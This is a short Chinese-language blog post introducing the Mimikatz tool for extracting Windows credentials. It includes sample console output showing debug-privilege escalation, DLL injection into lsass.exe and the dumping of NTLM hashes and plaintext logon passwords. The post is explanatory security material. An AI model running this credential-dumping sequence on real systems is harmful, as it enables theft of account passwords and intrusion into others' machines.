Mimikatz_trunk是一款功能强大的渗透测试工具,主要用于从Windows系统内存中提取凭证信息,帮助安全专家检测系统的脆弱性。
32位与64位系统均适用。不过在测试过程中需要以管理员权限运行。法国黑客工具mimikatz可以直接读取管理员密码明文,在XP、Win2003、Win7和Win2008等操作系统上都有效,WIN2000尚未进行过测试,但个人认为应该也能成功。
我还看到一篇使用该工具直接从lsass.exe中获取Windows当前登录账号的明文密码的文章。我自己尝试了在win2008 r2 x64系统上进行了测试,总之这个工具的功能非常强大,还有更多功能有待大家深入挖掘。
mimikatz:用于恢复Lsass中的明文密码
我本打算早些时候写一篇博客来介绍它的这一特性,但一直没时间。这里简要介绍一下一个名为mimikatz的工具的一个很酷的功能。我要感谢该工具作者让我注意到了它。在此之前,我一直以为无法恢复登录Windows用户的明文密码,而这对大多数渗透测试人员来说肯定非常有用。
下面是一些由作者提供的样本输出:
```
mimikatz 1.0 x86 (pre-alpha) /* Traitement du Kiwi */
mimikatz # privilege::debugDemande dACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 488Attente de connexion du client...Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant Gentil KiwiSekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz # @getLogonPasswordsAuthentification Id : 0;434898Package dauthentification : NTLMUtilisateur principal : Gentil UserDomaine dauthentification : vm-w7-ult msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c } wdigest : password tspkg : password
Authentification Id : 0;269806Package dauthentification : NTLMUtilisateur principal : Gentil KiwiDomaine dauthentification : vm-w7-ult msv1_0 : lm{ d0e9aee149655a6075e4540af1f22d3b }, ntlm{ cc36cf7a8514893efccd332446158b1a } wdigest : waza1234/ tspkg : waza1234/
```
我很好奇,为什么明文密码需要存储在LSASS中。毕竟每个渗透测试人员都知道不需要使用密码本身进行身份验证,只需要哈希值即可。
谷歌搜索似乎表明wdigest(即密码)用于支持HTTP Digest认证以及其他一些要求认证方知道实际密码而非仅是哈希的方案。